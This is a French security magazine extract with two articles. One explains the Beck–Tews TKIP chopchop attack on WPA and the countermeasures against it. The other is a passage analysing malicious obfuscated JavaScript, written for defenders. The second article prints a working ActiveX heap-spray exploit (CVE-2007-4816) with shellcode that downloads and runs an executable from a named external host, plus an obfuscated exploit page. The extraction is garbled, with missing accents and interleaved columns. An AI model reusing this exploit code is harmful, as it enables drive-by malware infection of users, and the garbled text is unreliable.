epuis lexistence de la technologie WiFi, de nouvelles faiblesses ont t rgulirement dcouvertes au niveau des mcanismes de scurit destins garantir une confidentialit des changes. Ainsi, trs rapidement, WEP (Wired Equivalent Privacy) a prsent des carences dans sa conception qui ont dbouch sur la capacit de dterminer la cl de chiffrement utilise et ainsi le dcodage complet des flux changs avec un point daccs en moins de quelques minutes. Afin de combler ces carences, WPA (WiFi Protected Access) a t dvelopp. Rcemment, la socit ElcomSoft a fait une annonce ( voir l'encadr Sur Internet [1]) indiquant quils avaient russi casser le chiffrement de WPA grce une nouvelle technologie base sur lutilisation des processeurs graphiques NVidia qui permettait de multiplier par 100 la performance dun test itratif des cls par rapport aux logiciels nutilisant que les processeurs traditionnels. Mais est-ce vraiment cette annonce qui rend WPA apocryphe?
graphiques NVidia comme unit de calcul. Il nen reste pas moins quune cl de 8 caractres dont chacun pourrait tre une minuscule, majuscule ou un signe, soit 26+26+10 possibilits par caractre engendrera tout de mme 628 possibilits, soit prs de 220 000 milliards. En admettant quil soit possible de tester un million de cls par seconde, il faudra plus de 2500 jours, soit prs de 7 ans, pour tester toutes les cls. Par consquent, un mot de passe dune taille raisonnable nest pas prt dtre cass par une attaque par force brute, surtout considrant que la cl peut monter jusqu 63 caractres, soit 8 10112 possibilits. En ralit, le nouveau risque li lutilisation de WPA provient dune faiblesse de conception de TKIP (Temporal Key Integrity Protocol) rvle peu aprs lannonce sensation dElcomSoft.
TKIP
La scurit de WPA repose sur une cl, en ralit un mot de passe, qui sert chiffrer les donnes changes. Cette cl, appele PSK (Pre-Shared Key), a une longueur pouvant aller de 8 256 bits, soit de 8 63 caractres ASCII. ElcomSoft affirme tre mme de tester 50 000 cls par seconde en sappuyant sur des processeurs
TKIP est un protocole destin combler les faiblesses dcouvertes dans WEP, tout en vitant une modification des matriels WiFi. En effet, au dpart, WPA devait sappuyer sur le protocole AES-CCMP (Advanced Encryption Standard Counter-Mode/CBC-Mac Protocol) mais celui-ci est si gourmand en calcul quil est ncessaire de lui mettre disposition un processeur spcialis, ce qui rendait obsoltes tous les matriels dj existants. TKIP a donc pour but de mettre en place des contre-mesures
44
HAKIN9 2/2009
44_45_46_47_WiFi.indd
44
2009-01-06, 19:16
WPA
dans le but de faire chouer toutes les attaques WEP connues et ainsi rendre nouveau le WiFi digne de confiance, sans pour autant ncessiter un changement de matriel. Avant tout, il faut signaler un point important : TKIP sappuie sur WEP. Par consquent, compte tenu que WEP se casse trs facilement, TKIP ne doit compter que sur lui pour sa scurit. WEP chiffrait les donnes avec une cl constante, laquelle il ajoutait un vecteur dinitialisation (IV) diffrent. Cette mthode ayant t dfaite par les attaques de type FMS, KoreK ou PTW bases sur la capture passive de paquets puis la dtermination de la cl par analyse des donnes captures, TKIP va lui renouveler la cl priodiquement. De plus, contrairement WEP qui transmettait lIV en clair, ce qui a permis de casser WEP rapidement, TKIP lui, va envoyer un hachage de lIV sur les ondes. Par ailleurs, TKIP ajoute un code dauthentification du message : MIC (Message Integrity Code) galement appel Michael, qui permet de lutter contre les attaques de checksum CRC32 qui existent avec WEP. TKIP met galement en place un compteur de squence (TSC = TKIP Sequence Counter ) pour garantir larrive squentielle des paquets et ainsi empcher les attaques de rejeu (replay). Pour lutter contre lattaque chopchop (voir l'encadr Sur Internet [2]), TKIP va dtruire tout paquet reu si celuici un ICV (Integrity Check Value) incorrect. Si lICV est correct, mais que Michael ne lest pas, alors le paquet est considr comme une tentative dattaque malveillante. Dans ce cas, TKIP renvoie un paquet MIC failure report frame et arme un compteur de 60 secondes. Si dans ce laps de temps un autre paquet avec un ICV correct et un MIC incorrect est reu, TKIP lance une procdure de mise jour de la cl. Dans le cadre des changes normaux de paquets, TKIP incrmente le TSC du canal correspondant. En cas de rception dun paquet avec un TSC infrieur avec celui attendu, le paquet est galement dtruit.
a i
Eric Tews, chercheur lUniversit de Dresden, et Martin Beck, de lUniversit de Darmstadt, ont dcrit dans un document [2] une nouvelle mthode dcoulant dune technique chopchop modifie et adapte WPA. Cependant, cette technique ncessite la satisfaction de contraintes pour russir. Comme nous lavons indiqu prcdemment, WPA peut fonctionner en sappuyant sur TKIP ou CCMP. La technique reposant sur TKIP, celui-ci doit tre utilis par le point daccs. Il est ncessaire que lchange se fasse sur un plan dadressage connu par la personne malveillante. Ainsi, il lui est possible de dduire la plus grande partie du codage des adresses IP. A ce niveau, la documentation des matriels utiliss qui fourniront la configuration par dfaut et souvent celle mise en uvre, sera une aide prcieuse. TKIP chiffre les paquets avec une cl renouvele priodiquement, il est ncessaire que la dure de vie de la cl soit suffisamment longue afin que lattaque puisse russir. Par exemple, avec un dlai de renouvellement dune heure, lattaque sera possible. L encore, la documentation du matriel utilis sera une aide prcieuse en rvlant la configuration par dfaut. Enfin, afin de fournir une meilleure Qualit de Service, la technologie WiFi permet dutiliser simultanment plusieurs canaux (ou TID = Traffic IDentifier) diffrents (de 0 7). Cette
fonction fait partie des spcifications 802.11e. Si cette fonction est active, elle permet daugmenter considrablement la russite de cette technique en multipliant par 8 la vitesse de test des diffrentes possibilits et en facilitant la dtermination des TSC car le plus souvent toute la communication se fait sur le canal 0, ce qui rend le TSC nettement infrieur ou nul, sur les autres canaux.
La technique
Le pirate va commencer par capturer des paquets en transit entre une machine et un point daccs jusqu ce quil obtienne un paquet de requte ARP (ARP request ) ou sa rponse (ARP reply). Dans ce type de paquet de trs petite taille, le contenu est aisment prvisible car il ne contient au final que des adresses MAC et des adresses IP, les adresses MAC ne sont pas chiffres, et le paquet est envoy vers une adresse de broadcast. De plus, le contenu du paquet (lorsquil est en clair) est normalis. Au final, il ne faudra en fait dcoder que les 12 octets de fin de paquet qui reprsentent pour 8 octets le MIC et pour 4 octets le checksum ICV. Grce aux outils ( voir l'encadr Sur Internet [3]) quils ont adapts cette nouvelle mthode, lattaque va donc pouvoir tre initie. Il faut noter que Martin Beck fait partie de lquipe de dveloppeurs de loutil AirCrack, ce qui explique pourquoi la nouvelle version disponible permet dj cette attaque. Le cassage de WPA sera effectu par la technique dite chopchop. Lattaque
44_45_46_47_WiFi.indd
45
2009-01-06, 19:16
TECHNIQUE
consiste ter un octet du paquet captur et le renvoyer sur le canal aprs avoir recalcul le checksum ICV. Si lICV est correct et compte tenu que Michael ne le sera pas, le point daccs renverra un paquet MIC failure report frame. En revanche, si lICV est incorrect, le paquet sera dtruit silencieusement. Ainsi, le pirate pourra dterminer le rsultat de lenvoi de son paquet modifi. Compte tenu quil faut patienter 60 secondes aprs la rception dun paquet MIC failure report frame pour ne pas provoquer la gnration dune nouvelle cl, il faudra, raison dune tentative par minute, environ 12 minutes au total pour dterminer les octets composant le MIC et lICV. Une fois ces informations obtenues, par comparaison de son paquet forg en respectant le MIC et lICV avec le paquet captur au dpart, le pirate pourra dterminer les adresses IP utilises et obtenir ainsi lintgralit du paquet en clair. du point daccs lui-mme. De plus, sil y avait des sondes dintrusion (IDS = Intrusion Detection System), alors celles-ci pourraient galement tre utilises contre le point daccs. Enfin, si le pirate pouvait dcoder le MIC dans les deux sens du flux (mission et rception), il serait mme de fabriquer autant de paquets avec un contenu sa discrtion quil voudra et les envoyer sur le rseau. Mais on peut se demander sil ne serait pas intressant dempiler les technologies lorsque lon parle dutiliser du WiFi. En effet, on constate quavec le temps de nouvelles faiblesses sont dcouvertes et il existe dores et dj des solutions applicatives qui pourraient tre utilises au dessus du WiFi afin de ne pas faire reposer la confidentialit que sur WEP, WPA ou WPA2 uniquement. De plus, nombreuses sont les entreprises qui imposent lutilisation de leur solution ExtraNet sur leurs points daccs WiFi dans le but de rduire les risques daccs non autoris.
Les consquences
Soyons ralistes Ici, la cl de chiffrement des paquets nest pas compromise et par consquent la situation nest pas aussi dramatique quavec lutilisation de WEP car les donnes changes restent encore confidentielles. Cependant, si le risque est bien moindre, il reste non ngligeable car il peut permettre de provoquer des dnis de service sur la relation dune machine avec son point daccs ou mme
Fort heureusement, il existe de simples actions effectuer pour se prvenir contre ce risque. Ainsi, paramtrer le point daccs pour quil rgnre la cl, par exemple, toutes les deux minutes suffira mettre en chec cette nouvelle attaque. Si cest possible, modifier la configuration afin quaucun paquet MIC failure report frame ne soit renvoy permettra galement de rendre aveugle le pirate qui, du coup, ne pourra plus mener bien son attaque. Et bien sr, lidal reste de ne plus utiliser TKIP mais CCMP qui fait partie dAES. AES, qui est galement le protocole utilis dans WPA2 a t approuv par le NIST (National Institute of Standards and Technology) et est considr, lheure actuelle, suffisamment robuste pour tre utilis par le Gouvernement des Etats-Unis comme algorithme de chiffrement pour ses donnes jusquau niveau Top Secret . Donc, autant que possible, migrer vers WPA2 est un bon placement.
Avant tout, quelle que soit la solution, celleci doit exiger une nouvelle authentification. Idalement, il ne serait pas utile dauthentifier laccs au point daccs, voire mme de le laisser fonctionner en clair. Lutilisateur se connecterait donc au point daccs, lequel ne lui permettrait que de sauthentifier pour utiliser la solution ExtraNet hberge sur le hotspot WiFi.
Lauthentification forte
Idalement, lauthentification doit tre forte, cest--dire deux facteurs. Le plus souvent, une authentification simple, donc un seul facteur, est utilise. Il sagit en gnral dun ce que lutilisateur connat , savoir son nom daccs (login) et le mot de passe statique associ. Cependant, un second facteur peut exister, tel ce que lutilisateur dtient , ou ce que lutilisateur est . Ainsi, une calculatrice gnrant des mots de passe usage unique ou une analyse dempreinte digitale ou rtinienne par exemple peut tre un second facteur.
Une fois lutilisateur connect sur le point daccs, celui-ci ne doit pouvoir lui laisser faire quune seule action : lancer le logiciel client destin tablir, par exemple, un tunnel IPsec ou SSL aprs authentification. Ce type de passerelle noffrant que cet unique service, tant architecture et scurise afin dtre accessible depuis Internet, leur niveau de protection est souvent renforc et le suivi de leurs mises jour scrupuleusement effectu.
44_45_46_47_WiFi.indd
46
2009-01-06, 19:16
WPA
Le client WiFi devra donc sauthentifier sur cette nouvelle passerelle, laquelle pourra utiliser un serveur dauthentification de type Radius ou Tacacs par exemple. Une fois fait, un tunnel VPN (Virtual Private Network) est tabli au dessus du lien WiFi telle que le montre la Figure 1. Le tunnel tant chiffr et pouvant mme intgrer dautres fonctions comme la dtection du NAT (si on parle dun tunnel IPsec), lensemble est donc dun niveau de scurit nettement suprieur celui dun accs WiFi classique. Cependant, ce type de solution prsente des inconvnients. Ainsi, lorsque seule la technologie WiFi est utilise, le passage hors de porte, puis nouveau porte dun autre ou du mme point daccs ne provoquera quune coupure ponctuelle, le lien tant rtabli automatiquement. Au rtablissement du lien WiFi, lutilisateur dispose donc nouveau dune adresse IP dans le rseau et peut continuer ses actions en cours. Lorsquun tunnel est en plus tabli, la mme situation va provoquer une perte du tunnel mais, pour le rtablir, il faut repasser par la phase dauthentification. Pire encore, selon le paramtrage de lauthentification et de la passerelle, il pourra falloir attendre un dlai pour se reconnecter la passerelle. Cependant, il nen reste pas moins que lensemble est bien plus robuste quavec un lien WiFi simple. En admettant quune personne malveillante arrive casser la scurit du lien WiFi (WEP, WPA ou WPA2), elle se trouve face un flux lui-mme chiffr quil lui faut nouveau casser. De plus, hormis avec des paquets spcialiss tels les requtes ARP, le pirate ne peut pas avoir la moindre ide du contenu en clair dun paquet car en ralit, aucun paquet ne transite sur le lien WiFi sans avoir t pralablement chiffr par la solution de tunnel VPN.
Un relais applicatif
Une autre approche, plus rarement utilise, consiste sappuyer sur une solution de relais applicatif tel un reverse proxy ou un VDI (Virtual Desktop Infrastructure). Le principe de fonctionnement dun relais applicatif est, par opposition un tunnel VPN par exemple, que lutilisateur nest pas reli directement au rseau, mais une machine quil va utiliser pour atteindre le rseau, en rebondissant sur celle-ci. Seule cette machine est relie au rseau. Ainsi, un reverse proxy HTTP ou HTTPS, cas le plus connu de relais applicatif, permet de forcer un goulet dtranglement o seront appliqus des contrles daccs plus draconiens. De plus, ces contrles daccs fonctionnant au niveau applicatif, ils permettront une granularit plus forte. Cependant, un reverse proxy WWW nest pas ici la meilleure solution car il est trop limitatif dans ses fonctionnalits pour permettre lutilisation dun vaste ventail de solutions diffrentes (WWW, clients lourds, connexions des bases de donnes relationnelles). Une approche bien plus souple consiste effectuer du VDI. Le VDI, exprim simplement, nest quune technologie o un serveur, sur lequel lutilisateur doit se connecter, effectue en lieu et place de lutilisateur les actions, comme le montre la Figure 2. Par consquent, le poste de travail de lutilisateur nest pas reli au rseau et ne fera aucune action autre que de rester synchronis avec laffichage du serveur VDI. Selon le logiciel VDI choisi, lutilisateur distant pourra se voir contraindre utiliser un client lourd, ou avoir la possibilit de voir laffichage encapsuler dans une page HTTPS qui sappuie par exemple sur la technologie Java comme client lourd. Dans ce second cas, lutilisateur na donc besoin que dun navigateur (Internet Explorer ou
Firefox par exemple) pour pouvoir disposer des outils ncessaires ltablissement de sa session. Lutilisateur se trouve donc dans une situation de session distance. Bien sr, il faudra choisir le logiciel VDI pour sa souplesse et aussi ses fonctions de scurit. Il peut tre mme possible de faire du Windows Terminal Server (si le serveur est en Windows 2003 afin que le patch SSL soit appliqu car sinon le chiffrement de ce logiciel est trop insuffisant), du Citrix ou du VMware par exemple. Cette solution prsente entre autres galement lavantage de garantir un poste de travail standard sur le rseau, toujours maintenu et conforme aux politiques de lentreprise puisque lutilisateur na aucun privilge autre que le droit de lutiliser. Sil nest pas possible denvoyer un fichier vers le poste VDI, alors il ny aura plus de risque de transmission dun virus ou dun ver par ce canal. Si lutilisateur a besoin de donnes personnelles, alors ltablissement dun lien vers une ressource disque partage o sera hberg son rpertoire personnel satisfera ce besoin. En revanche, il pourra rester le fait que les favoris par exemple, ou le paramtrage personnalis des logiciels du poste VDI (tel le client de messagerie par exemple) pourrait ne pas tre possibles.
Conclusion
Sur Internet
http://www.elcomsoft.com/news/268.html Practical attacks against WEP and WPA Martin Beck, TU-Dresden, Germany, Erik Tews, TUDarmstadt, Germany November 8, 2008 - http://dl.aircrack-ng.org/breakingwepandwpa.pdf
Malgr de nouvelles faiblesses dcouvertes rgulirement, la technologie WiFi, si celle-ci repose sur WPA2 ou du chiffrement AES, reste digne de confiance. Cependant, pour lentreprise qui se mfie de la scurit des solutions WiFi, il existe toujours des moyens dempiler dautres systmes de scurit sur les points daccs. Ces solutions qui peuvent rclamer leur propre authentification, offrent la possibilit dtablir un tunnel chiffr au dessus du point daccs, ou de rebondir sur une machine en mode session, laquelle serait connecte au rseau dentreprise et sous son contrle exclusif. Ainsi, toutes les garanties possibles de scurit sont apportes. Laurent Levier
Les outils adapts cette nouvelle technique sont : Aircrack-ng http://www.aircrack-ng.org Tkiptun-ng http://www.aircrack-ng.org/doku.php?id=tkiptun-ng Chopchop http://www.netstumbler.org/f50/chopchop-experimental-wep-attacks-12489/
Laurent Levier est Directeur Dlgu la Scurit du Systme dInformation chez Equant Tlcommunications, filiale du Groupe France Tlcom, depuis une dizaine dannes. Auparavant, Consultant en Scurit des Systmes dInformation. Pour contacter l'auteur : llevier@argosnet.com. 2/2009 HAKIN9 47
44_45_46_47_WiFi.indd
47
2009-01-06, 19:16
TECHNIQUE
DAVID MACIEJAK
Degr de difficult
ous commencerons par l'anayse du Shellcode. Les scripts offusqus dlivrent un script malicieux qui utilise des mthodes vulnrables comme le tlchargement d'un fichier arbitraire ou exploite un overflow dans un composant ActiveX, il inclut donc un shellcode permettant d'excuter du code. Ce dernier est gnralement un shellcode download&execute utilis pour sauver un malware sur le poste de la victime.
La valeur est utilise pour remplir un tableau. Mais quoi cela peut il bien correspondre ? Cette technique est utilise pour remplir la heap car nous pouvons dterminer avec exactitude sa position lorsque l'overflow aura lieu. Cette technique est appele Heap Spray. La prsentation d'Alexander Sotirov ou l'article Wikipedia vous en apprendront plus (voir la section Sur Internet). Il explique l'utilit de la mthode substring ou de l'oprateur + dans une boucle for pour crire sur la heap. De nombreux blocs sont allous et la dernire ligne de script tre appele est
yings["rawParse"](chilam)
Nous allons voir dans cette partie comment dbuguer un shellcode pour comprendre ce qu'il fait en tche de fond. L'tape suivante est l'tude du Listing 1. Premirement, comme vous le voyez, l'objet ActiveX est cr en utilisant la mthode DOM Javascript et suivi par le shellcode qui utilise un encodage Unicode et qui est sauv dans une variable nomme shellcode. Dans un second temps, nous allons dbuguer ce shellcode pour comprendre ce qu'il fait mais,auparavant, intressons-nous la variable shellcode. Aprs l'initialisation, nous voyons que shellcode est utilise dans une boucle for:
for (i=0; i<300; i++) qq784378237[i] = block + shellcode;
En fait, ce code est une des nombreuses manires de Javascript d'crire un appel de fonction. Ce code est identique
yings.rawParse(chilam)
C'est donc un appel la mthode rawParse de l'objet yings (dfini en dbut de code) :
6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB
il s'agit du composant ActiveX Baofeng Storm MPS.StormPlayer.1 (mps.dll). Cette vulnrabilit est rfrence en tant que CVE-2007-4816. Identifions ce que le shellcode fait.
48
HAKIN9 2/2009
48_49_50_51_52_53_54_55_56_57_58_Javascript.indd
48
2009-01-09, 11:38
SCRIPTS MALICIEUX
La mthode que nous allons dcrire n'exige pas que le composant ActiveX vulnrable soit install, nous verrons comment crer un excutable et l'excuter dans un dbugueur. code par IDA et non pas comme data qui est la valeur par dfaut. Vous devez vous dplacer dans le code assembleur pour trouver une grosse partie de db ou juste cliquer sur la chaine EEEEtn dans la fentre des chanes pour sauter immdiatement au dbut du shellcode (voir Figure 4). Une fois sur le code, vous pouvez forcer IDA l'identifier en tant que tel en appuyant sur la touche C. Listing 1. Shellcode identifier
yings=document.createElement("object"); yings.setAttribute("classid", "clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB"); var shellcode = unescape("%u90"+"90" + "%u90"+"90" + "%uefe9"+ ... + %u0065"); var bigblock = unescape("%u9090"+"%u9090"); var cuteqqoday; cuteqqoday = 20; var cuteqqoday2; cuteqqoday2 = cuteqqoday+shellcode.length; while (bigblock.length<cuteqqoday2) bigblock+=bigblock; fillblock = bigblock.substring(0, cuteqqoday2); block = bigblock.substring(0, bigblock.length-cuteqqoday2); while(block.length+cuteqqoday2<0x40000) block = block+block+fillblock; cuteqqsss = new Array(); qq784378237 = cuteqqsss; for (i=0; i<300; i++) qq784378237[i] = block + shellcode; var chilam = ''; while (chilam["length"] < 4057) chilam+="\x0a\x0a\x0a\x0a"; chilam+="\x0a"; chilam+="\x0a"; chilam+="\x0a"; chilam+="\x0a\x0a\x0a\x0a"; chilam+="\x0a\x0a\x0a\x0a"; yings["rawParse"](chilam)
%u9090%u9090%uefe9%u0000%u5a00... %u776f%u2e6e%u7865%u0065
Vous obtiendrez le code correspondant pour la section entire comme dans la Figure 5. Maintenant, vous pouvez suivre l'excution du code et identifier d'autres chanes de caractres. Vous devez ensuite slectionner les blocs et appuyer sur la touche U correspondant Undefine ou choisir l'option dans le menu droulant du bouton de droite. Ensuite, choisissez plusieurs
Comme vous le voyez, il dbute par l'oprateur 90, qui sont des NOPs, suivi par un %uefe9 qui correspond un jump, efe9 doit tre lu comme E9 EF. Le script du Listing 2 devrait aider pour transformer le shellcode Unicode en hexadcimal. Nous devons maintenant l'ajouter dans un programme C comme celui du Listing 3 et le compiler pour poursuivre notre investigation. Ce code a pour effet d'appeler le shellcode, vous pouvez utiliser Dev-C++ sous Microsoft Windows pour le compiler. Une fois le binaire obtenu, voyons comment le dboguer. De nombreux dbogueurs existent comme Ollydbg (gratuit) ou IDA. Les captures d'crans suivantes sont prises d'IDA mais vous pouvez faire la mme chose avec Ollydbg. Glissez et dposez le binaire compil sur le raccourci IDA, la fentre d'ouverture de nouveau fichier s'affiche (voir Figure 1). Cochez Charger les ressources et validez par le bouton Ok. L'cran principal d'IDA s'ouvre et le moteur commence analyser le sample (voir Figure 2). Jetez un rapide coup d'il la fentre des Chaines pour voir si vous pouvez identifier quelque chose La capture de la Figure 3 montre les principales cls du shellcode. urlmon(.dll) doit tre charg pour trouver la mthode URLDownloadToFileA afin de sauver en tche de fond http:// qqq.hao1658.com/down.exe (grande probabilit que ce fichier soit un virus, au moment de l'criture ce lien tait inaccessible) dans le rpertoire systme (GetSystemDirectoryA) et ensuite WinExec sera appel afin d'excuter ce fichier. Pour tre sr de cette analyse rapide, vous pouvez le dboguer. Pour cela, allez sur le bloc correspondant au shellcode dans le binaire afin de l'identifier comme
2/2009 HAKIN9
49
48_49_50_51_52_53_54_55_56_57_58_Javascript.indd
49
2009-01-06, 19:17
TECHNIQUE
lignes et pressez la touche A pour crer une chane (ou choisir l'option dans le menu du bouton de droite). Si le code utilise un encodage XOR il peut tre prouvant de suivre le code, la meilleure solution est de suivre l'excution en temps rel. Pour cela, vous devez au pralable identifier une instruction et y positionner un breakpoint. Un breakpoint est un flag sur une instruction qui indique au dbogueur de stopper l'excution et de faire tourner le code suivant tape par tape command par l'analyste. Les breakpoints peuvent tre positionns en pressant la touche F2, la couleur de la ligne d'instruction devient alors rouge. Notez que, par dfaut, les breakpoints sont de type software, un breakpoint hardware peut tre configur en cliquant avec le bouton de droite sur la ligne rouge et en choisissant dans le menu d'diter le breakpoint. De l, vous pouvez configurer le type de breakpoint (hardware) et le mode d'excution (comme le montre la figure 6). Ce breakpoint utilisera donc les registres spciaux du CPU X86 qui sont faits cet effet, ceci peut prvenir la dtection par un sample malicieux. Aprs avoir configur les breakpoints, nous pouvons excuter le programme en appuyant sur la touche F9 et suivre le flot d'excutions en pressant F8 (ou F7 si vous voulez une analyse approfondie). Vous verrez que le code, comme suspect, essaye de tlcharger un fichier malicieux, de l'enregistrer dans C:\WINDOWS\SYSTEM32\a.exe et de l'excuter en prfixant son chemin par cmd /c.
Depuis quelques annes, nous avons vu des organisations criminelles travailler sur des packs d'exploit incluant des interfaces de management des donnes en PHP comme, pour en citer quelquesuns, Mpack et Neosploit. Ces outils sont utiliss pour crer des serveurs malicieux. Ils embarquent de nombreux exploits, comme le prsente la liste suivante, qui peuvent tre configurs pour ne cibler que des applications, clients web ou domaines spcifiques.
50 HAKIN9 2/2009
48_49_50_51_52_53_54_55_56_57_58_Javascript.indd
50
2009-01-06, 19:17
SCRIPTS MALICIEUX
Microsoft MDAC RDS.Dataspace ActiveX Control Remote Code Execution Vulnerability Microsoft Windows Vector Markup Language Buffer Overrun Vulnerability Microsoft Windows Cursor And Icon ANI Format Handling Remote Buffer Overflow Vulnerability Xunlei Thunder PPLAYER.DLL_1_WORK ActiveX Control Buffer Overflow Vulnerability SSReader Ultra Star Reader ActiveX Control Register Method Buffer Overflow Vulnerability BaoFeng Storm MPS.DLL ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities PPStream PowerPlayer.DLL ActiveX Control Buffer Overflow Vulnerability Xunlei Web Thunder ActiveX Control DownURL2 Method Remote Buffer Overflow Vulnerability Yahoo! Webcam ActiveX Control Buffer Overrun Vulnerability Baidu Soba Search Bar BaiduBar.DLL ActiveX Control Remote Code Execution Vulnerability RealPlayer 'rmoc3260.dll' ActiveX Control Memory Corruption Vulnerability RealPlayer 'ierpplug.dll' ActiveX Control Stack Buffer Overflow Vulnerability a t ajout. En outre, ce code est coup en 2 parties (2 tags javascript). La premire chose faire avant de l'analyser est donc de le nettoyer. Quelques quote et double quote ont t chapps pour rendre l'analyse plus difficile, nous n'avons pas besoin de comprendre la totalit mais il est important de voir l'usage de la fonction xQ94 et de l'appel document.write. Le listing 5 prsente une version propre du Listing 4. Pour dsoffusquer le code, vous avez juste besoin d'craser l'appel write par un print et de le lancer dans votre dbogueur prfr. Vous obtiendrez le code du Listing 6 ; comme vous le voyez, ce code charge un ActiveX 78ABDC59D8E7-44D3-9A76-9A0918C52B4A qui correspond au composant Sina Downloader, un outil populaire en Chine. Il utilise une erreur de design dans la mthode DownloadAndInstall pour effectuer des oprations malicieuses.
L'ancienne version de Mpack se trouvait parfois $700 pour le pack par dfaut, des modules supplmentaires pouvaient tre ajouts pour $50 $150 selon la popularit de l'application vise. Ces toolkits utilisent dsormais des couches par dfaut d'offusquation (au moins deux). De plus, il arrive que celle-ci soit faite en temps rel par le code PHP ; ainsi, chaque fois que vous demandez la page, vous obtenez une page chiffre diffremment! Nous pouvons dire que les scripts d'exploits sont donc server side polymorphique.
Bien sr, rien n'empche les auteurs de script malicieux de crer leur propre fonction de codage, comme dans le script du Listing 4. Si vous regardez attentivement ce code, vous verrez que du code inutile
48_49_50_51_52_53_54_55_56_57_58_Javascript.indd
51
2009-01-06, 19:17
TECHNIQUE
Listing 4. Fonction custom de dcodage
<html> <head> <Meta Name=Encoder Content=sina> <META HTTP-EQUIV="imagetoolbar" CONTENT="no"> <noscript> <iframe></iframe> </noscript> <script language="javascript"> <!-- cB62="BEvXycyX",vX19="BqXqy\"Hq";.7762511,vR37=".2422728",vX19= 'wi\$\(\-5\"Bv78M0g\+J\%\ \@V\;\)jSZ\\\#\&\*13\ <\r4db9Xx\?\,\{K\_6\]z\`T\} QloD\:Oy\~sAG\|nrfHe\/Ek\'\!FNRP2IqULu\>\n\=Yct\[\^pa\.CmhW', cB62='B7pw\) \$m2\.6\&i\n\|\/Cg8\\cA\'WN\%\;RTEq\?Fj\> L\<tv9K\^rDkIedPs\*\=yHO\[f\}0Z\:\"\rzX\] x3\-o4\@\{luGaJQ\+5\_SVYb\(\~1\#M\ h\,U\!\`n';function xQ94(fZ25){"BqqcEqEH", l=fZ25.length;'ULviQ\|e\?',w='';while(l--)"BwEycvqc", o=cB62.indexOf(fZ25.charAt(l)), 'Uvmm\?LLv',w=(o==-1?fZ25.charAt(l):vX19.charAt(o))+w; "BX\"qcHEw",cB62= cB62.substring(1)+cB62.charAt(0),document.write(w);'Uim\&i\&\&v'};xQ94( ~17Hz8kL\!w\'rX31SXz8\]hyZ3\*A\]Sz\~17Hz8k\!L\!w\'rLH\~S\!3z1\,Hz\ ~Hz1391\ !3zSbkL\!AZ31s7\!3HS1wmk\!L\!w\'m\^\&\n\n\'\*Ak\!L\!w\'A\*LH\~S\!3z1\ ,Hz\~Hz1391\!3zSbz3B8lSz\~17HzwmX31SXz8\]hyZ3m\ 'A\]Sz\~17Hz8kzL\!w3\'r7\] wLH\~S\!3z1\,yh\}3XZ\r\rB7zLHB\,Z7L3\<hX\'r7\]w3\,B\`7\~\`\{bq\ 'X31SXz8\]hyZ3A\ *\*A7\]wLH\~S\!3z1\,yh\}3XZ\'rLH\~S\!3z1\,\~h\ 1SX3o\.3z1Zwo\.3z1\,if5NoOfnu\ 'ALH\~S\!3z1\,Hz\!HSZ3LHBzbkzL\!A\*3yZ3rLH\~S\!3z1\,Hz\!HSZ3S\ bkzL\!A\*Ad\ :\?bqtq\?A\ \(I\&b\$tq\>A\]Sz\~17Hz8kLBZw\'rB7zLHB\,Z1h1SZ8b8m8mAZ31s7\ !3HS1wmkLBZw\'m\^q\n\n\'A\*AkLBZw\'ABf\&Jb\$\?\>qA\.\"\?\&bJ66\>A\] Sz\~17Hz8kLLZw\'r7\]wLH\~S\!3z1\,hyy\'rLH\~S\!3z1\,HzZ3y3\~1Z1hX1b\] Sz\~17Hz8w\'rX31SXz8\]hyZ3\*AZ31s7\!3HS1wmkLLZw\'m\^6\n\n\'\*\ *AkLLZw\'ASst\&b\?tqIABvq\nbt\n\$6A\!xq\$bqtqIA\}uIJb\?\n\$\$A9\:JJb\ >qt\&Az\ (\&6b\&qttALCtJbq\n\$\&AAky7\~3zZ3Lk1Hkbm\`S\}S\]3z\|mAF\-Z\~X7\ 1V")
Cette instruction retourne la fonction entire depuis laquelle cette instruction est appele, en gardant les espaces et sauts de lignes. Elle est souvent utilise pour dtecter toute modification du script original. Listing 20 (que vous trouverez sur le site http://www.hakin9.org/prt/view/ listings.html tlcharger parmi les autres listings du numro). Cette technique ralentit l'analyse, car si vous modifiez la fonction en y ajoutant des commandes de debug, vous modifiez aussi la cl qui sert dcoder la chane encode, vous obtiendrez donc un rsultat incomprhensible. L'astuce ici consiste trouver la cl et la hardcoder dans la variable de la cl (ici q17vcDYfM ). Pour cela, nous avons juste besoin d'ajouter un print(q17vcDYfM) aprs l'initialisation de q17vcDYfM et d'excuter le script dans un dbogueur. Nous obtenons la chane suivante :
FUNCTIONPP5OMP5LAVK6BQD4PIVARQ17VCDY
//--> </script> <sCRipT Language=JavascrIpT> xQ94("j3\*\nSYj34\"\[Y\>bj\n4\*\"\\n\#\#h\$\-5Vp6\ (\!OX\#\-X\#\$\*0h\-\\1OX\#\-X\#\( 2\#\-K\#on\#\`H\'\\1n\,\]\:\-\#\(\/tQF\?Q2Y\>bj\n4\*\ "\\1OX\#\-X\#\(2\n\%3\*\nS\\eU\|\|UQv\| \|UFFmL2\\X\,\`\-\(\r4G4a\"\*\}aYjo34\"\[Y\>bj\. \}\[\~Y\>bj\}\.g4\!\*\\p\<\(pX\:\#\,HH\\ 1H\,\:\:p\<\(1H\:p\<f\&i\"\.\[\!mv\$\[i4\&\$LL\[F\$v\ "\&e\$v\"\|v\?i\!mQ\.L\"Yjo\} \.g4\!\*Y\>bj\%\!a\+J\*Y\>b6\,\]\\\~4\#\~1g\:a\?\(2n\#\#hfoo\`\`\ `UKXptpU1O\`o\`\`U\-K\ -2\'\>bpX\:\#\,HHM2\[O7XHO\,\<\"X\<\+X\:\#\,HH2d\)\~4\#\~1g\:a\?W\'\ >bjo\%\!a\ +J\*Y\>bjo\.\}\[\~Yjo3\*\nSY\>b\>b") </script> </head> <body> <noscript> <b><font color=red>?????????Javascript????? !!!############</font></b> </noscript> </body> </html>
qui correspond la fonction pP5oMp5la o tous les caractres non alphanumriques ont t enlevs par l'utilisation de l'expression rgulire replace(/\W/g,' ') et transforms en majuscule par l'appel la mthode toUpperCase(). Cette chane peut tre nettoye pour devenir la cl de dcodage en enlevant le code ajout au pralable, nous devons donc supprimer PRINTQ17VCDYFM . Note : des scripts avancs utilisent une combinaison de argument.callee.
toString() + location.href;
